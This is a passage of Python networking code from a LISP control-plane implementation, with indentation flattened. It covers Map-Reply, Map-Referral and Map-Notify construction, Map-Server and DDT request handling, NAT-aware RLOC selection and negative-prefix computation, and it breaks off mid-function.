# lisp_process_smr_invoked_request
#
def lisp_process_smr_invoked_request(map_request):
lprint("Received SMR-invoked Map-Request")
return
#enddef
#
# lisp_build_map_reply
#
# Build a Map-Reply and return a packet to the caller.
#
def lisp_build_map_reply(eid, group, rloc_set, nonce, action, ttl, map_request,
keys, enc, auth, mr_ttl=-1):
rloc_probe = map_request.rloc_probe if (map_request != None) else False
json_telemetry = map_request.json_telemetry if (map_request != None) else \
None
map_reply = lisp_map_reply()
map_reply.rloc_probe = rloc_probe
map_reply.echo_nonce_capable = enc
map_reply.hop_count = 0 if (mr_ttl == -1) else mr_ttl
map_reply.record_count = 1
map_reply.nonce = nonce
packet = map_reply.encode()
map_reply.print_map_reply()
eid_record = lisp_eid_record()
eid_record.rloc_count = len(rloc_set)
if (json_telemetry != None): eid_record.rloc_count += 1
eid_record.authoritative = auth
eid_record.record_ttl = ttl
eid_record.action = action
eid_record.eid = eid
eid_record.group = group
packet += eid_record.encode()
eid_record.print_record(" ", False)
local_rlocs = lisp_get_all_addresses() + lisp_get_all_translated_rlocs()
probing_rloc = None
for rloc_entry in rloc_set:
multicast = rloc_entry.rloc.is_multicast_address()
rloc_record = lisp_rloc_record()
probe_bit = rloc_probe and (multicast or json_telemetry == None)
addr_str = rloc_entry.rloc.print_address_no_iid()
if (addr_str in local_rlocs or multicast):
rloc_record.local_bit = True
rloc_record.probe_bit = probe_bit
rloc_record.keys = keys
if (rloc_entry.priority == 254 and lisp_i_am_rtr):
rloc_record.rloc_name = "RTR"
#endif
if (probing_rloc == None): probing_rloc = rloc_entry.rloc
#endif
rloc_record.store_rloc_entry(rloc_entry)
rloc_record.reach_bit = True
rloc_record.print_record(" ")
packet += rloc_record.encode()
#endfor
#
# Add etr-out-ts if telemetry data was present in Map-Request.
#
if (json_telemetry != None):
rloc_record = lisp_rloc_record()
if (probing_rloc): rloc_record.rloc.copy_address(probing_rloc)
rloc_record.local_bit = True
rloc_record.probe_bit = True
rloc_record.reach_bit = True
js = lisp_encode_telemetry(json_telemetry, eo=str(time.time()))
rloc_record.json = lisp_json("telemetry", js)
rloc_record.print_record(" ")
packet += rloc_record.encode()
#endif
return(packet)
#enddef
#
# lisp_build_map_referral
#
# Build a Map-Referral and return a packet to the caller.
#
def lisp_build_map_referral(eid, group, ddt_entry, action, ttl, nonce):
map_referral = lisp_map_referral()
map_referral.record_count = 1
map_referral.nonce = nonce
packet = map_referral.encode()
map_referral.print_map_referral()
eid_record = lisp_eid_record()
rloc_count = 0
if (ddt_entry == None):
eid_record.eid = eid
eid_record.group = group
else:
rloc_count = len(ddt_entry.delegation_set)
eid_record.eid = ddt_entry.eid
eid_record.group = ddt_entry.group
ddt_entry.map_referrals_sent += 1
#endif
eid_record.rloc_count = rloc_count
eid_record.authoritative = True
#
# Use action passed into this function. But if NULL, select the action
# based on the first ddt-node child type.
#
incomplete = False
if (action == LISP_DDT_ACTION_NULL):
if (rloc_count == 0):
action = LISP_DDT_ACTION_NODE_REFERRAL
else:
ddt_node = ddt_entry.delegation_set[0]
if (ddt_node.is_ddt_child()):
action = LISP_DDT_ACTION_NODE_REFERRAL
#endif
if (ddt_node.is_ms_child()):
action = LISP_DDT_ACTION_MS_REFERRAL
#endif
#endif
#endif
#
# Conditions when the incomplete bit should be set in the Map-Referral.
#
if (action == LISP_DDT_ACTION_NOT_AUTH): incomplete = True
if (action in (LISP_DDT_ACTION_MS_REFERRAL, LISP_DDT_ACTION_MS_ACK)):
incomplete = (lisp_i_am_ms and ddt_node.is_ms_peer() == False)
#endif
eid_record.action = action
eid_record.ddt_incomplete = incomplete
eid_record.record_ttl = ttl
packet += eid_record.encode()
eid_record.print_record(" ", True)
if (rloc_count == 0): return(packet)
for ddt_node in ddt_entry.delegation_set:
rloc_record = lisp_rloc_record()
rloc_record.rloc = ddt_node.delegate_address
rloc_record.priority = ddt_node.priority
rloc_record.weight = ddt_node.weight
rloc_record.mpriority = 255
rloc_record.mweight = 0
rloc_record.reach_bit = True
packet += rloc_record.encode()
rloc_record.print_record(" ")
#endfor
return(packet)
#enddef
#
# lisp_etr_process_map_request
#
# Do ETR processing of a Map-Request.
#
def lisp_etr_process_map_request(lisp_sockets, map_request, source, sport,
ttl, etr_in_ts):
if (map_request.target_group.is_null()):
db = lisp_db_for_lookups.lookup_cache(map_request.target_eid, False)
else:
db = lisp_db_for_lookups.lookup_cache(map_request.target_group, False)
if (db): db = db.lookup_source_cache(map_request.target_eid, False)
#endif
eid_str = map_request.print_prefix()
if (db == None):
lprint("Database-mapping entry not found for requested EID {}". \
format(green(eid_str, False)))
return
#endif
prefix_str = db.print_eid_tuple()
lprint("Found database-mapping EID-prefix {} for requested EID {}". \
format(green(prefix_str, False), green(eid_str, False)))
#
# Get ITR-RLOC to return Map-Reply to.
#
itr_rloc = map_request.itr_rlocs[0]
if (itr_rloc.is_private_address() and lisp_nat_traversal):
itr_rloc = source
#endif
nonce = map_request.nonce
enc = lisp_nonce_echoing
keys = map_request.keys
#
# If we found telemetry data in the Map-Request, add the input timestamp
# now and add output timestamp when building the Map-Reply.
#
jt = map_request.json_telemetry
if (jt != None):
map_request.json_telemetry = lisp_encode_telemetry(jt, ei=etr_in_ts)
#endif
db.map_replies_sent += 1
packet = lisp_build_map_reply(db.eid, db.group, db.rloc_set, nonce,
LISP_NO_ACTION, 1440, map_request, keys, enc, True, ttl)
#
# If we are sending a RLOC-probe Map-Reply to an RTR, data encapsulate it.
# If we are getting RLOC-probe Map-Requests from an xTR behind a NAT, and
# we are an ETR not behind a NAT, we want to return the RLOC-probe Map-Reply
# to the swapped control ports.
#
# We could be getting a RLOC-probe from an xTR that is behind the same
# NAT as us. So do not data encapsulate the RLOC-probe reply.
#
# There is a special hack here. If the sport is 0, this RLOC-probe
# request is coming from an RTR. If we are doing gleaning on the RTR,
# this xTR needs to data encapsulate the RLOC-probe reply. The lisp_rtr_
# list will not be set because a gleaned xTR does not have NAT-traversal
# enabled.
#
if (map_request.rloc_probe and len(lisp_sockets) == 4):
public = (itr_rloc.is_private_address() == False)
rtr = itr_rloc.print_address_no_iid()
if ((public and lisp_rtr_list.has_key(rtr)) or sport == 0):
lisp_encapsulate_rloc_probe(lisp_sockets, itr_rloc, None, packet)
return
#endif
#endif
#
# Send to lisp-core process to send packet from UDP port 4342.
#
lisp_send_map_reply(lisp_sockets, packet, itr_rloc, sport)
return
#enddef
#
# lisp_rtr_process_map_request
#
# Do RTR processing of a Map-Request.
#
def lisp_rtr_process_map_request(lisp_sockets, map_request, source, sport,
ttl, etr_in_ts):
#
# Get ITR-RLOC to return Map-Reply to.
#
itr_rloc = map_request.itr_rlocs[0]
if (itr_rloc.is_private_address()): itr_rloc = source
nonce = map_request.nonce
eid = map_request.target_eid
group = map_request.target_group
rloc_set = []
for myrloc in [lisp_myrlocs[0], lisp_myrlocs[1]]:
if (myrloc == None): continue
rloc = lisp_rloc()
rloc.rloc.copy_address(myrloc)
rloc.priority = 254
rloc_set.append(rloc)
#endfor
enc = lisp_nonce_echoing
keys = map_request.keys
#
# If we found telemetry data in the Map-Request, add the input timestamp
# now and add output timestamp in building the Map-Reply.
#
jt = map_request.json_telemetry
if (jt != None):
map_request.json_telemetry = lisp_encode_telemetry(jt, ei=etr_in_ts)
#endif
packet = lisp_build_map_reply(eid, group, rloc_set, nonce, LISP_NO_ACTION,
1440, map_request, keys, enc, True, ttl)
lisp_send_map_reply(lisp_sockets, packet, itr_rloc, sport)
return
#enddef
#
# lisp_get_private_rloc_set
#
# If the source-EID and target-EID of a Map-Request are behind the same NAT,
# that is, have the same global RLOC address, then return just the private
# addresses in the Map-Reply so the xTRs have shortest RLOC paths between
# each other and don't have to hair-pin through the NAT/firewall device.
#
def lisp_get_private_rloc_set(target_site_eid, seid, group):
rloc_set = target_site_eid.registered_rlocs
source_site_eid = lisp_site_eid_lookup(seid, group, False)
if (source_site_eid == None): return(rloc_set)
#
# Get global RLOC address from target site.
#
target_rloc = None
new_set = []
for rloc_entry in rloc_set:
if (rloc_entry.is_rtr()): continue
if (rloc_entry.rloc.is_private_address()):
new_rloc = copy.deepcopy(rloc_entry)
new_set.append(new_rloc)
continue
#endif
target_rloc = rloc_entry
break
#endfor
if (target_rloc == None): return(rloc_set)
target_rloc = target_rloc.rloc.print_address_no_iid()
#
# Get global RLOC address from source site.
#
source_rloc = None
for rloc_entry in source_site_eid.registered_rlocs:
if (rloc_entry.is_rtr()): continue
if (rloc_entry.rloc.is_private_address()): continue
source_rloc = rloc_entry
break
#endfor
if (source_rloc == None): return(rloc_set)
source_rloc = source_rloc.rloc.print_address_no_iid()
#
# If the xTRs are behind the same NAT, then we return private addresses.
#
site_id = target_site_eid.site_id
if (site_id == 0):
if (source_rloc == target_rloc):
lprint("Return private RLOCs for sites behind {}".format( \
target_rloc))
return(new_set)
#endif
return(rloc_set)
#endif
#
# If the xTRs are not behind the same NAT, but are configured in the
# same site-id, they can reach each other with private addresses. So
# return them in the RLOC-set.
#
if (site_id == source_site_eid.site_id):
lprint("Return private RLOCs for sites in site-id {}".format(site_id))
return(new_set)
#endif
return(rloc_set)
#enddef
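#
# Illustrative only (nothing here executes): a hedged example of the logic
# above with made-up addresses. If the target site registered private RLOC
# 192.168.1.2 plus global RLOC 128.9.1.1, and the source site registered
# private RLOC 192.168.1.3 plus the same global RLOC 128.9.1.1, the globals
# match, so the returned RLOC-set contains only 192.168.1.2 and the two xTRs
# can talk directly without hair-pinning through the NAT. If the globals
# differ but both sites are configured with the same non-zero site-id, the
# private set is returned as well.
#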
#
# lisp_get_partial_rloc_set
#
# If the Map-Request source is found in the RLOC-set, return all RLOCs that
# do not have the same priority as the Map-Request source (an RTR supporting
# NAT-traversal) RLOC. Otherwise, return all RLOCs that are not priority 254.
#
def lisp_get_partial_rloc_set(registered_rloc_set, mr_source, multicast):
rtr_list = []
rloc_set = []
#
# Search the RTR list to see if the Map-Requestor is an RTR. If so,
# return the RLOC-set to the RTR so it can replicate directly to ETRs.
# Otherwise, return the RTR-list locator-set to the requesting ITR/PITR.
#
rtr_is_requestor = False
behind_nat = False
for rloc_entry in registered_rloc_set:
if (rloc_entry.priority != 254): continue
behind_nat |= True
if (rloc_entry.rloc.is_exact_match(mr_source) == False): continue
rtr_is_requestor = True
break
#endfor
#
# If we find an RTR in the RLOC-set, then the site's RLOC-set is behind
# a NAT. Otherwise, do not return a partial RLOC-set. This RLOC-set is in
# public space.
#
if (behind_nat == False): return(registered_rloc_set)
#
# An RTR can be behind a NAT when deployed in a cloud infrastructure.
# When the MS is in the same cloud infrastructure, the source address
# of the Map-Request (ECM) is not translated. So we are forced to put
# the private address in the rtr-list the MS advertises. But we should
# not return the private address in any Map-Replies. We use the private
# address in the rtr-list for the sole purpose of identifying the RTR so
# we can return the RLOC-set of the ETRs.
#
ignore_private = (os.getenv("LISP_RTR_BEHIND_NAT") != None)
#
# Create two small lists. A list of RTRs which are unicast priority of
# 254 and a rloc-set which are records that are not priority 254.
#
for rloc_entry in registered_rloc_set:
if (ignore_private and rloc_entry.rloc.is_private_address()): continue
if (multicast == False and rloc_entry.priority == 255): continue
if (multicast and rloc_entry.mpriority == 255): continue
if (rloc_entry.priority == 254):
rtr_list.append(rloc_entry)
else:
rloc_set.append(rloc_entry)
#endif
#endfor
#
# The RTR is sending the Map-Request.
#
if (rtr_is_requestor): return(rloc_set)
#
# An ITR is sending the Map-Request.
#
# Check the case where an ETR included a local RLOC and may be behind
# the same NAT as the requester. In this case, the requester can encap
# directly to the private RLOC. If it is not reachable, the ITR can encap
# to the RTR. The ITR will cache a subset of the RLOC-set in this entry
# (so it can check the global RLOC first and not encap to itself).
#
rloc_set = []
for rloc_entry in registered_rloc_set:
if (rloc_entry.rloc.is_private_address()): rloc_set.append(rloc_entry)
#endfor
rloc_set += rtr_list
return(rloc_set)
#enddef
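#
# Illustrative only (nothing here executes): a hedged example with made-up
# RLOCs, assuming the LISP_RTR_BEHIND_NAT environment variable is not set.
# Suppose a site registered [10.0.0.2 (private, priority 1), 128.9.1.1
# (public, priority 1), 212.201.0.5 (RTR, priority 254)]:
#
#   - If the Map-Request comes from the RTR 212.201.0.5, it gets the real
#     ETR RLOCs [10.0.0.2, 128.9.1.1] so it can encapsulate directly.
#   - If it comes from an ITR/PITR, it gets [10.0.0.2, 212.201.0.5], i.e.
#     any private RLOCs (in case the ITR is behind the same NAT) plus the
#     RTR, but not the site's other registered RLOCs.
#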
#
# lisp_store_pubsub_state
#
# Take information from Map-Request to create a pubsub cache. We remember
# the map-server lookup EID-prefix. So when the RLOC-set changes for this
# EID-prefix, we trigger a Map-Notify message to the ITR's RLOC and port
# number.
#
def lisp_store_pubsub_state(reply_eid, itr_rloc, mr_sport, nonce, ttl, xtr_id):
pubsub = lisp_pubsub(itr_rloc, mr_sport, nonce, ttl, xtr_id)
pubsub.add(reply_eid)
return
#enddef
#
# lisp_convert_reply_to_notify
#
# In lisp_ms_process_map_request(), a proxy map-reply is built to return to
# a requesting ITR. If the requesting ITR set the N-bit in the Map-Request,
# a subscription is being requested, so return a Map-Notify so the ITR knows
# it has been acked.
#
# This function takes a fully built Map-Reply, changes the first 4 bytes to
# make the message a Map-Notify and inserts 4-bytes of Key-ID, Alg-ID, and
# Authentication Length of 0. Then we have converted the Map-Reply into a
# Map-Notify.
#
def lisp_convert_reply_to_notify(packet):
#
# Get data we need from Map-Reply for Map-Notify.
#
record_count = struct.unpack("I", packet[0:4])[0]
record_count = socket.ntohl(record_count) & 0xff
nonce = packet[4:12]
packet = packet[12::]
#
# Build Map-Notify header.
#
first_long = (LISP_MAP_NOTIFY << 28) | record_count
header = struct.pack("I", socket.htonl(first_long))
auth = struct.pack("I", 0)
#
# Concat fields of Map-Notify.
#
packet = header + nonce + auth + packet
return(packet)
#enddef
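#
# Illustrative only (nothing here executes): assuming the standard message
# type values (Map-Reply = 2, Map-Notify = 4), the conversion above turns a
# Map-Reply whose first long is 0x20000001 (one EID-record) into a Map-Notify
# whose first long is 0x40000001, keeps the 8-byte nonce, and inserts 4 zero
# bytes for Key-ID, Alg-ID, and Authentication Data Length ahead of the
# EID-records.
#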
#
# lisp_notify_subscribers
#
# There has been an RLOC-set change, inform all subscribers who have subscribed
# to this EID-prefix.
#
def lisp_notify_subscribers(lisp_sockets, eid_record, eid, site):
eid_str = eid.print_prefix()
if (lisp_pubsub_cache.has_key(eid_str) == False): return
for pubsub in lisp_pubsub_cache[eid_str].values():
itr = pubsub.itr
port = pubsub.port
itr_str = red(itr.print_address_no_iid(), False)
sub_str = bold("subscriber", False)
xtr_id = "0x" + lisp_hex_string(pubsub.xtr_id)
nonce = "0x" + lisp_hex_string(pubsub.nonce)
lprint(" Notify {} {}:{} xtr-id {} for {}, nonce {}".format( \
sub_str, itr_str, port, xtr_id, green(eid_str, False), nonce))
lisp_build_map_notify(lisp_sockets, eid_record, [eid_str], 1, itr,
port, pubsub.nonce, 0, 0, 0, site, False)
pubsub.map_notify_count += 1
#endfor
return
#enddef
#
# lisp_process_pubsub
#
# Take a fully built Map-Reply and send a Map-Notify as a pubsub ack.
#
def lisp_process_pubsub(lisp_sockets, packet, reply_eid, itr_rloc, port, nonce,
ttl, xtr_id):
#
# Store subscriber state.
#
lisp_store_pubsub_state(reply_eid, itr_rloc, port, nonce, ttl, xtr_id)
eid = green(reply_eid.print_prefix(), False)
itr = red(itr_rloc.print_address_no_iid(), False)
mn = bold("Map-Notify", False)
xtr_id = "0x" + lisp_hex_string(xtr_id)
lprint("{} pubsub request for {} to ack ITR {} xtr-id: {}".format(mn,
eid, itr, xtr_id))
#
# Convert Map-Reply to Map-Notify header and send out.
#
packet = lisp_convert_reply_to_notify(packet)
lisp_send_map_notify(lisp_sockets, packet, itr_rloc, port)
return
#enddef
#
# lisp_ms_process_map_request
#
# Do Map-Server processing of a Map-Request. Returns various LISP-DDT internal
# and external action values.
#
def lisp_ms_process_map_request(lisp_sockets, packet, map_request, mr_source,
mr_sport, ecm_source):
#
# Look up EID in site cache. If we find it and it has registered for
# proxy-replying, this map-server will send the Map-Reply. Otherwise,
# send to one of the ETRs at the registered site.
#
eid = map_request.target_eid
group = map_request.target_group
eid_str = lisp_print_eid_tuple(eid, group)
itr_rloc = map_request.itr_rlocs[0]
xtr_id = map_request.xtr_id
nonce = map_request.nonce
action = LISP_NO_ACTION
pubsub = map_request.subscribe_bit
#
# Check if we are verifying Map-Request signatures. If so, do a mapping
# database lookup on the source-EID to get public-key.
#
sig_good = True
is_crypto_hash = (lisp_get_eid_hash(eid) != None)
if (is_crypto_hash):
sig = map_request.map_request_signature
if (sig == None):
sig_good = False
lprint(("EID-crypto-hash signature verification {}, " + \
"no signature found").format(bold("failed", False)))
else:
sig_eid = map_request.signature_eid
hash_eid, pubkey, sig_good = lisp_lookup_public_key(sig_eid)
if (sig_good):
sig_good = map_request.verify_map_request_sig(pubkey)
else:
lprint("Public-key lookup failed for sig-eid {}, hash-eid {}".\
format(sig_eid.print_address(), hash_eid.print_address()))
#endif
pf = bold("passed", False) if sig_good else bold("failed", False)
lprint("EID-crypto-hash signature verification {}".format(pf))
#endif
#endif
if (pubsub and sig_good == False):
pubsub = False
lprint("Suppress creating pubsub state due to signature failure")
#endif
#
# There are two cases here that need attention. If the Map-Request was
# an IPv6 Map-Request but the ECM came to us in a IPv4 packet, we need
# to return the Map-Reply in IPv4. And if the Map-Request came to us
# through a NAT, sending the Map-Reply to the Map-Request port won't
# get translated by the NAT. So we have to return the Map-Reply to the
# ECM port. Hopefully, the RTR is listening on the ECM port and using
# the Map-Request port as the ECM port as well. This is typically only
# a problem on the RTR, when behind a NAT. For an ITR, it usually
# doesn't send Map-Requests since NAT-traversal logic installs default
# map-cache entries.
#
reply_dest = itr_rloc if (itr_rloc.afi == ecm_source.afi) else ecm_source
site_eid = lisp_site_eid_lookup(eid, group, False)
if (site_eid == None or site_eid.is_star_g()):
notfound = bold("Site not found", False)
lprint("{} for requested EID {}".format(notfound,
green(eid_str, False)))
#
# Send negative Map-Reply with TTL 15 minutes.
#
lisp_send_negative_map_reply(lisp_sockets, eid, group, nonce, itr_rloc,
mr_sport, 15, xtr_id, pubsub)
return([eid, group, LISP_DDT_ACTION_SITE_NOT_FOUND])
#endif
prefix_str = site_eid.print_eid_tuple()
site_name = site_eid.site.site_name
#
# If the request is for a non Crypto-EID, signatures are configured to be
# required, and no signature is in the Map-Request, bail.
#
if (is_crypto_hash == False and site_eid.require_signature):
sig = map_request.map_request_signature
sig_eid = map_request.signature_eid
if (sig == None or sig_eid.is_null()):
lprint("Signature required for site {}".format(site_name))
sig_good = False
else:
sig_eid = map_request.signature_eid
hash_eid, pubkey, sig_good = lisp_lookup_public_key(sig_eid)
if (sig_good):
sig_good = map_request.verify_map_request_sig(pubkey)
else:
lprint("Public-key lookup failed for sig-eid {}, hash-eid {}".\
format(sig_eid.print_address(), hash_eid.print_address()))
#endif
pf = bold("passed", False) if sig_good else bold("failed", False)
lprint("Required signature verification {}".format(pf))
#endif
#endif
#
# Check if site-eid is registered.
#
if (sig_good and site_eid.registered == False):
lprint("Site '{}' with EID-prefix {} is not registered for EID {}". \
format(site_name, green(prefix_str, False), green(eid_str, False)))
#
# We do not want to return a coarser EID-prefix to the Map-Resolver. The
# AMS site entry may be one.
#
if (site_eid.accept_more_specifics == False):
eid = site_eid.eid
group = site_eid.group
#endif
#
# Send forced-TTLs even for native-forward entries.
#
ttl = 1
if (site_eid.force_ttl != None):
ttl = site_eid.force_ttl | 0x80000000
#endif
#
# Send negative Map-Reply with TTL 1 minute.
#
lisp_send_negative_map_reply(lisp_sockets, eid, group, nonce, itr_rloc,
mr_sport, ttl, xtr_id, pubsub)
return([eid, group, LISP_DDT_ACTION_MS_NOT_REG])
#endif
#
# Should we proxy-reply?
#
nat = False
pr_str = ""
check_policy = False
if (site_eid.force_nat_proxy_reply):
pr_str = ", nat-forced"
nat = True
check_policy = True
elif (site_eid.force_proxy_reply):
pr_str = ", forced"
check_policy = True
elif (site_eid.proxy_reply_requested):
pr_str = ", requested"
check_policy = True
elif (map_request.pitr_bit and site_eid.pitr_proxy_reply_drop):
pr_str = ", drop-to-pitr"
action = LISP_DROP_ACTION
elif (site_eid.proxy_reply_action != ""):
action = site_eid.proxy_reply_action
pr_str = ", forced, action {}".format(action)
action = LISP_DROP_ACTION if (action == "drop") else \
LISP_NATIVE_FORWARD_ACTION
#endif
#
# Apply policy to determine if we send a negative map-reply with action
# "policy-denied" or we send a map-reply with the policy set parameters.
#
policy_drop = False
policy = None
if (check_policy and lisp_policies.has_key(site_eid.policy)):
p = lisp_policies[site_eid.policy]
if (p.match_policy_map_request(map_request, mr_source)): policy = p
if (policy):
ps = bold("matched", False)
lprint("Map-Request {} policy '{}', set-action '{}'".format(ps,
p.policy_name, p.set_action))
else:
ps = bold("no match", False)
lprint("Map-Request {} for policy '{}', implied drop".format(ps,
p.policy_name))
policy_drop = True
#endif
#endif
if (pr_str != ""):
lprint("Proxy-replying for EID {}, found site '{}' EID-prefix {}{}". \
format(green(eid_str, False), site_name, green(prefix_str, False),
pr_str))
rloc_set = site_eid.registered_rlocs
ttl = 1440
if (nat):
if (site_eid.site_id != 0):
seid = map_request.source_eid
rloc_set = lisp_get_private_rloc_set(site_eid, seid, group)
#endif
if (rloc_set == site_eid.registered_rlocs):
m = (site_eid.group.is_null() == False)
new_set = lisp_get_partial_rloc_set(rloc_set, reply_dest, m)
if (new_set != rloc_set):
ttl = 15
rloc_set = new_set
#endif
#endif
#endif
#
# Force TTL if configured. To denote seconds in TTL field of EID-record
# set high-order bit in ttl value.
#
if (site_eid.force_ttl != None):
ttl = site_eid.force_ttl | 0x80000000
#endif
#
# Does policy say what the TTL should be, and whether we should drop the
# Map-Request and return a negative Map-Reply?
#
if (policy):
if (policy.set_record_ttl):
ttl = policy.set_record_ttl
lprint("Policy set-record-ttl to {}".format(ttl))
#endif
if (policy.set_action == "drop"):
lprint("Policy set-action drop, send negative Map-Reply")
action = LISP_POLICY_DENIED_ACTION
rloc_set = []
else:
rloc = policy.set_policy_map_reply()
if (rloc): rloc_set = [rloc]
#endif
#endif
if (policy_drop):
lprint("Implied drop action, send negative Map-Reply")
action = LISP_POLICY_DENIED_ACTION
rloc_set = []
#endif
enc = site_eid.echo_nonce_capable
#
# Don't tell spoofer any prefix information about the target EID.
#
if (sig_good):
reply_eid = site_eid.eid
reply_group = site_eid.group
else:
reply_eid = eid
reply_group = group
action = LISP_AUTH_FAILURE_ACTION
rloc_set = []
#endif
#
# If this Map-Request is also a subscription request, return same
# information in a Map-Notify.
#
packet = lisp_build_map_reply(reply_eid, reply_group, rloc_set,
nonce, action, ttl, map_request, None, enc, False)
if (pubsub):
lisp_process_pubsub(lisp_sockets, packet, reply_eid, itr_rloc,
mr_sport, nonce, ttl, xtr_id)
else:
lisp_send_map_reply(lisp_sockets, packet, itr_rloc, mr_sport)
#endif
return([site_eid.eid, site_eid.group, LISP_DDT_ACTION_MS_ACK])
#endif
#
# If there are no registered RLOCs, return.
#
rloc_count = len(site_eid.registered_rlocs)
if (rloc_count == 0):
lprint("Requested EID {} found site '{}' with EID-prefix {} with " + \
"no registered RLOCs".format(green(eid_str, False), site_name,
green(prefix_str, False)))
return([site_eid.eid, site_eid.group, LISP_DDT_ACTION_MS_ACK])
#endif
#
# Forward to ETR at registered site. We have to put in an ECM.
#
hash_address = map_request.target_eid if map_request.source_eid.is_null() \
else map_request.source_eid
hashval = map_request.target_eid.hash_address(hash_address)
hashval %= rloc_count
etr = site_eid.registered_rlocs[hashval]
if (etr.rloc.is_null()):
lprint(("Suppress forwarding Map-Request for EID {} at site '{}' " + \
"EID-prefix {}, no RLOC address").format(green(eid_str, False),
site_name, green(prefix_str, False)))
else:
lprint(("Forwarding Map-Request for EID {} to ETR {} at site '{}' " + \
"EID-prefix {}").format(green(eid_str, False),
red(etr.rloc.print_address(), False), site_name,
green(prefix_str, False)))
#
# Send ECM.
#
lisp_send_ecm(lisp_sockets, packet, map_request.source_eid, mr_sport,
map_request.target_eid, etr.rloc, to_etr=True)
#endif
return([site_eid.eid, site_eid.group, LISP_DDT_ACTION_MS_ACK])
#enddef
#
# lisp_ddt_process_map_request
#
# Do DDT-node processing of a Map-Request received from a Map-Resolver.
#
def lisp_ddt_process_map_request(lisp_sockets, map_request, ecm_source, port):
#
# Lookup target EID address in DDT cache.
#
eid = map_request.target_eid
group = map_request.target_group
eid_str = lisp_print_eid_tuple(eid, group)
nonce = map_request.nonce
action = LISP_DDT_ACTION_NULL
#
# First check to see if EID is registered locally if we are a Map-Server.
# Otherwise, do DDT lookup.
#
ddt_entry = None
if (lisp_i_am_ms):
site_eid = lisp_site_eid_lookup(eid, group, False)
if (site_eid == None): return
if (site_eid.registered):
action = LISP_DDT_ACTION_MS_ACK
ttl = 1440
else:
eid, group, action = lisp_ms_compute_neg_prefix(eid, group)
action = LISP_DDT_ACTION_MS_NOT_REG
ttl = 1
#endif
else:
ddt_entry = lisp_ddt_cache_lookup(eid, group, False)
if (ddt_entry == None):
action = LISP_DDT_ACTION_NOT_AUTH
ttl = 0
lprint("DDT delegation entry not found for EID {}".format( \
green(eid_str, False)))
elif (ddt_entry.is_auth_prefix()):
#
# Check auth-prefix. That means there are no referrals.
#
action = LISP_DDT_ACTION_DELEGATION_HOLE
ttl = 15
ddt_entry_str = ddt_entry.print_eid_tuple()
lprint(("DDT delegation entry not found but auth-prefix {} " + \
"found for EID {}").format(ddt_entry_str,
green(eid_str, False)))
if (group.is_null()):
eid = lisp_ddt_compute_neg_prefix(eid, ddt_entry,
lisp_ddt_cache)
else:
group = lisp_ddt_compute_neg_prefix(group, ddt_entry,
lisp_ddt_cache)
eid = lisp_ddt_compute_neg_prefix(eid, ddt_entry,
ddt_entry.source_cache)
#endif
ddt_entry = None
else:
ddt_entry_str = ddt_entry.print_eid_tuple()
lprint("DDT delegation entry {} found for EID {}".format( \
ddt_entry_str, green(eid_str, False)))
ttl = 1440
#endif
#endif
#
# Build and return a Map-Referral message to the source of the Map-Request.
#
packet = lisp_build_map_referral(eid, group, ddt_entry, action, ttl, nonce)
nonce = map_request.nonce >> 32
if (map_request.nonce != 0 and nonce != 0xdfdf0e1d): port = LISP_CTRL_PORT
lisp_send_map_referral(lisp_sockets, packet, ecm_source, port)
return
#enddef
#
# lisp_find_negative_mask_len
#
# XOR the two addresses so we can find the first bit that is different. Then
# count the number of bits from the left that bit position is. That is the
# new mask-length. Compare to the neg-prefix mask-length we have found so
# far. If the new one is longer than the stored one so far, replace it.
#
# This function assumes the address size and the address-family are the same
# for 'eid' and 'entry_prefix'. Caller must make sure of that.
#
def lisp_find_negative_mask_len(eid, entry_prefix, neg_prefix):
diff_address = eid.hash_address(entry_prefix)
address_size = eid.addr_length() * 8
mask_len = 0
#
# The first set bit is the one that is different.
#
for mask_len in range(address_size):
bit_test = 1 << (address_size - mask_len - 1)
if (diff_address & bit_test): break
#endfor
if (mask_len > neg_prefix.mask_len): neg_prefix.mask_len = mask_len
return
#enddef
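#
# A hedged worked example (comment only), assuming hash_address() XORs the
# two addresses as described above. For eid 10.1.1.1 and entry_prefix
# 10.2.0.0:
#
#   0x0a010101 ^ 0x0a020000 = 0x00030101
#
# The first set bit from the left is bit position 14, so the loop breaks with
# mask_len 14, which replaces neg_prefix.mask_len if it is longer than what
# was stored so far.
#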
#
# lisp_neg_prefix_walk
#
# Callback routine to decide which prefixes should be considered by function
# lisp_find_negative_mask_len().
#
# 'entry' in this routine could be a lisp_ddt_entry() or a lisp_site_eid().
#
def lisp_neg_prefix_walk(entry, parms):
eid, auth_prefix, neg_prefix = parms
if (auth_prefix == None):
if (entry.eid.instance_id != eid.instance_id):
return([True, parms])
#endif
if (entry.eid.afi != eid.afi): return([True, parms])
else:
if (entry.eid.is_more_specific(auth_prefix) == False):
return([True, parms])
#endif
#endif
#
# Find bits that match.
#
lisp_find_negative_mask_len(eid, entry.eid, neg_prefix)
return([True, parms])
#enddef
#
# lisp_ddt_compute_neg_prefix
#
# Walk the DDT cache to compute the least specific prefix within the auth-
# prefix found.
#
def lisp_ddt_compute_neg_prefix(eid, ddt_entry, cache):
#
# Do not compute negative prefixes for distinguished-names or geo-prefixes.
#
if (eid.is_binary() == False): return(eid)
neg_prefix = lisp_address(eid.afi, "", 0, 0)
neg_prefix.copy_address(eid)
neg_prefix.mask_len = 0
auth_prefix_str = ddt_entry.print_eid_tuple()
auth_prefix = ddt_entry.eid
#
# Walk looking for the shortest prefix that DOES not match any site EIDs
# configured.
#
eid, auth_prefix, neg_prefix = cache.walk_cache(lisp_neg_prefix_walk,
(eid, auth_prefix, neg_prefix))
#
# Store high-order bits that are covered by the mask-length.
#
neg_prefix.mask_address(neg_prefix.mask_len)
lprint(("Least specific prefix computed from ddt-cache for EID {} " + \
"using auth-prefix {} is {}").format(green(eid.print_address(), False),
auth_prefix_str, neg_prefix.print_prefix()))
return(neg_prefix)
#enddef
#
# lisp_ms_compute_neg_prefix
#
# From the site cache and the DDT cache, compute a negative EID-prefix that is
# not shorter than a configured authoritative-prefix.
#
def lisp_ms_compute_neg_prefix(eid, group):
neg_prefix = lisp_address(eid.afi, "", 0, 0)
neg_prefix.copy_address(eid)
neg_prefix.mask_len = 0
gneg_prefix = lisp_address(group.afi, "", 0, 0)
gneg_prefix.copy_address(group)
gneg_prefix.mask_len = 0
auth_prefix = None
#
# Look for the auth-prefix in the DDT cache. If not found, we return the
# host-based EID in a negative Map-Referral with action non-authoritative.
#
if (group.is_null()):
ddt_entry = lisp_ddt_cache.lookup_cache(eid, False)
if (ddt_entry == None):
neg_prefix.mask_len = neg_prefix.host_mask_len()
gneg_prefix.mask_len = gneg_prefix.host_mask_len()
